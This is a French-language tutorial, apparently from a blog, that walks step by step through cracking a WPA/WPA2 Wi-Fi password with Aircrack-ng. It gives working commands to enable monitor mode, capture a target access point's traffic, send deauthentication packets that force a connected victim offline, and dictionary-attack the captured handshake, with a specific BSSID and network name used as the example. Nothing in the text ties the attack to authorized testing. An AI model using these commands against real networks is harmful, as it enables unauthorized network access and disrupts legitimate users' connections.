Attaque WPA/WPA2

Le problème avec WPA et WPA2 c’est que l’on ne peut pas les cracker. Ou du moins on ne sait pas encore le faire. Si vous avez suivi l’actualité vous avez peut être vu qu’un chercheur belge a découvert une faille dans WPA2. Sauf que cette faille ne permet pas de retrouver le passphrase. Elle permet simplement de s’interposer entre le point d’accès et le client. Le pirate est donc en position de Man In The Middle et il peut écouter les conversations.

Mais ça n’est pas le sujet.

Pour le moment, il est impossible de cracker un mot de passe Wi-Fi (PSK bien entendu) avec une probabilité de succès de 100%. En revanche il existe des techniques permettant (avec un peu de chance) de trouver le mot de passe.

La première technique c’est celle du Brute Force. Pour cette attaque nous allons devoir écouter le trafic sur un réseau de manière à intercepter le handshake entre le client et le point d’accès (c’est ce que l’on appelle une attaque passive). Une fois ce handshake capturé il faudra le comparer à un dictionnaire de valeurs en espérant avoir la bonne.

Alors pour cette attaque nous allons avoir besoin de la suite Aircrack-ng. En sois les outils utilisés sont les mêmes que ceux que l’on a utilisé pour cracker WEP.

Dans un premier temps passez votre carte Wi-Fi en mode monitor avec airmon-ng en entrant cette commande :

airmon-ng start wlan0

Une fois la carte en mode monitor il va falloir récupérer le BSSID du point d’accès à attaquer. Pour ça on se sert d’airodump :

airodump-ng --encrypt wpa wlan0mon

wpaa1.png

Puis on recommence en spécifiant le canal et le BSSID du point d’accès :

airodump-ng -w capture -c "le canal" --bssid "le BSSID" "Votre interface Wifi"

Ma commande ressemble à ça :

airodump-ng -w capture -c 11 –bssid 24:EC:99:A5:E0:9B wlan0mon

wpaa2.png
Capture est le nom des fichiers qui seront générés par airodump. Il y en a deux qui nous intéressent : capture-01.cap qui est le fichier contenant les trames et capture-01.csv qui est un fichier de log :

wpaa3.png
Maintenant qu’on est à l’écoute du point d’accès on va pourvoir passer à l’attaque. Pour que l’attaque fonctionne il va falloir capturer le handshake. C’est à dire toute les communications faites entre le client et le point d’accès pour créer les clés de chiffrement.

Il y a deux cas de figures. Soit il y a déjà un client sur le réseau auquel cas vous pouvez passer à la suite. Soit il n’y en a pas et à ce moment là il faudra suivre cet article qui vous explique comment créer un faux client.

Comme nous avons un client de connecter nous avons juste à le forcer à se déconnecter et attendre la demande de reconnexion. Pour cela on va lancer une attaque deauthentication :

aireplay-ng -0 0 -b "BSSID du point d'accès" -e "ESSID du point d'accès" "votre interface Wi-Fi"

Donc dans mon cas :

aireplay-ng -0 0 -b 24:EC:99:A5:E0:9B -e NUMERICABLE-52D1 wlan0mon

L’option -o o spécifie une attaque par des-authentification. Cela va nous permettre de déconnecter la victime pour la forcer à renvoyer un handshake et donc pouvoir le capturer.

wpaa4.png
Stoppez l’attaque, retournez sur airodump et si vous voyez en haut à droite cette ligne :

wpaa5.png
Alors vous pourrez passer à la partie crackage avec aircrack-ng. Pour cela entrez cette commande :

aircrack-ng -w votredictionnaire.txt capture-01.cap

Avec votredictionnaire.txt le fichier contenant les mots de passe à comparer et capture-01.cap le fichier contenant le handshake. Aircrack va tester toutes les combinaisons présentes dans votre dictionnaire. Si l’une d’entre elle correspond au handshake alors vous aurez trouvé le mot de passe du réseau.